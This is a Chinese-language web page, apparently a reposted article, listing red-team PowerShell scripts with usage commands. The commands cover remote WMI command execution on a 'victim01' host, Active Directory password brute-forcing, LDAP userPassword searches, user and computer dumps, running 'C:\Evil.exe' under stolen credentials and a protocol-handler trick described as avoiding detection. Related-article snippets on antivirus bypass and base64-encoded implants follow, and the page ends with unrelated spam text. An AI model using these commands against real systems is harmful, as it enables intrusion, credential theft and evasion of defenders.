<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Red Team 常用 Powershell 腳本

    VSole2022-08-08 22:25:53

    各種常用PowerShell腳本:

    Search-EventForUser.ps1:在 Windows 事件日志中搜索特定用戶的 Powershell 腳本
    Search-FullNameToSamAccount.ps1:SamAccountName 的全名
    Search-UserPassword.ps1:在 LDAP 中搜索 userPassword 字段
    Remote-WmiExecute.ps1:使用 WMI 遠程執行命令
    Take-Screenshot.ps1:截圖(PNG)
    Get-BrowserHomepage.ps1:獲取瀏覽器主頁
    Get-IEBookmarks.ps1:列出所有 Internet Explorer 書簽 URL
    Invoke-ADPasswordBruteForce.ps1:測試用戶密碼
    Utility.ps1:包含幾個 cmdlet
    Run-As.ps1:以另一個用戶身份運行進程(憑據)
    Get-ProcessList.ps1:列出進程、所有者和命令行參數
    Remote-RegisterProtocolHandler.ps1:使用協議處理程序運行您的命令以繞過某些檢測
    Add-UserLogonScript:為特定用戶添加登錄腳本
    

    Search-EventForUser.ps1 用法

    module-import .\Search-EventForUser.ps1; Search-EventForUser -TargetUser "MrUn1k0d3r"
    module-import .\Search-EventForUser.ps1; "MrUn1k0d3r" | Search-EventForUser
    module-import .\Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -ComputerName DC01
    module-import .\Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -FindDC true
    module-import .\Search-EventForUser.ps1; "god", "mom" | Search-EventForUser -FindDC true
    module-import .\Search-EventForUser.ps1; "god", "mom" | Search-EventForUser -FindDC true -Username DOMAIN\admin -Password "123456"
    

    Search-FulNameToSamAccount.ps1 用法

    module-import .\Search-FullNameToSamAccount.ps1; Search-FullNameToSamAccount -Filter *god*
    module-import .\Search-FullNameToSamAccount.ps1; "god", "mom" | Search-FullNameToSamAccount
    

    Search-UserPassword.ps1 用法

    module-import .\Search-UserPassword.ps1; Search-UserPassword -Username *god*
    module-import .\Search-UserPassword.ps1; "god", "mom" | Search-UserPassword
    

    Remote-WmiExecute.ps1 用法

    module-import .\Remote-WmiExecute.ps1; Remote-WmiExecute -ComputerName victim01 -Payload "cmd.exe /c whoami"
    

    Take-Screenshot.ps1 用法

    module-import .\Take-Screenshot.ps1; Take-Screenshot -Path C:\test.png
    

    Get-BrowserHomepage.ps1 用法

    module-import .\Get-BrowserHomepage.ps1; Get-BrowserHomepage
    

    Get-IEBookmarks.ps1 用法 

    module-import .\Get-IEBookmarks.ps1; Get-IEBookmarks
    

    Invoke-ADPasswordBruteForce.ps1 用法

    module-import .\Invoke-ADPasswordBruteForce; Invoke-ADPasswordBruteForce -Username "mr.un1k0d3r" -Password "password"
    module-import .\Invoke-ADPasswordBruteForce; "neo","morpheus" | Invoke-ADPasswordBruteForce -Password "password"
    module-import .\Invoke-ADPasswordBruteForce; "neo","morpheus" | Invoke-ADPasswordBruteForce -Password "password" -Domain MATRIX
    

    Utility.ps1用法

    Search-EventForUser
    Search-EventForUserByDomain
    Search-EventForUserByIP
    Search-FullNameToSamAccount
    Ldap-GetProperty
    Search-UserPassword
    Dump-UserEmail
    Dump-Computers
    Dump-UserName
    

    Run-As.ps1 用法

    module-import .\Run-As.ps1; Run-As -Username RingZer0\Mr.Un1k0d3r -Password "IShouldNotLeakThisPasswordOnTheInternet" -Process "C:\Evil.exe"
    

    COM-Utility.ps1用法

    Invoke-COM-ScheduleService
    Invoke-COM-XMLHTTP
    Invoke-COM-ShellBrowserWindow
    Invoke-COM-WindowsScriptHost
    Invoke-COM-ProcessChain 
    Invoke-COM-ShellApplication
    

    Get-ProcessList.ps1 用法

    module-import .\Get-ProcessList.ps1; Get-ProcessList
    

    Remote-RegisterProtocolHandler.ps1 用法

    此 cmdlet 創建將調用您的有效負載的協議處理程序。這個想法是為了避免檢測,因為將執行的命令如下所示:explorer ms-browse://

    您注冊的自定義處理程序在哪里 ms-browser 并將執行您的命令

    module-import .\Remote-RegisterProtocolHandler.ps1; Remote-RegisterProtocolHandler -ComputerName host -Payload "command to run"
    module-import .\Remote-RegisterProtocolHandler.ps1; Remote-RegisterProtocolHandler -ComputerName host -Payload "command to run" -Handler ms-handler-name
    

    注:如有侵權請聯系刪除

    powershell
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    PowerShell入門學習
    2022-03-13 06:42:08
    PowerShell簡介 PowerShell是一種命令行外殼程序和腳本環境,它置于Windows7/Windows Server2008 R2及以上更高的版本中。它可以執行Linux系統下的一些命令,這是非常強大的一點。它的腳本后綴為(.ps1),可在磁盤中執行,也可無需寫入磁盤直接在內存中運行。 PowerShell的優點 1、Windows7以上的操作系統默認安裝。 2、Power
    顧名思義,無需將惡意文件傳到目標服務器/機器上,直接利用powershell的特性加載到內存執行。為了在紅隊行動中更隱蔽的實施攻擊以及橫向移動,同時還可以解決目標不出網只能通過dns上線時的棘手問題,利用powershell可以避免一行行echo。
    powershell免殺之路
    2021-07-12 21:46:00
    Windows PowerShell 是一種命令行外殼程序和腳本環境,使命令行用戶和腳本編寫者可以利用 .NET Framework的強大功能
    powershell對抗AV技巧
    2021-06-30 22:32:22
    今天介紹利用powershell上線來繞過AV防護,并介紹繞過添加用戶的攔截的方式。
    PowerSploit這是眾多PowerShell攻擊工具中被廣泛使用的PowerShell后期漏洞利用框架,常用于信息探測、特權提升、憑證竊取、持久化等操作。Empire基于PowerShell的遠程控制木馬,可以從憑證數據庫中導出和跟蹤憑據信息,常用于提供前期漏洞利用的集成模塊、信息探測、憑據竊取、持久化控制。
    系統安全第41篇是PowerShell系列的基礎知識和注冊表操作,希望您喜歡
    把上線命令進行base64編碼成功上線結果:360全程沒有任何攔截繞過并創建計劃任務用PowerShell創建計劃任務發現被攔截把powershell進行base64編碼執行我們的powershell代碼結果:?
    這凸顯了開發檢測惡意 PowerShell 命令的有效方法的迫切需要。在這項工作中,我們通過實施幾個新穎的惡意 PowerShell 命令檢測器并評估它們的性能來應對這一挑戰。在這項工作中,我們使用 AMSI 提供的信息對惡意 PowerShell 代碼檢測進行了首次研究。
    這個樣本是在2019年5月中使用的一個powershell樣本。背景Turla,也被稱為 Snake,是一個
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类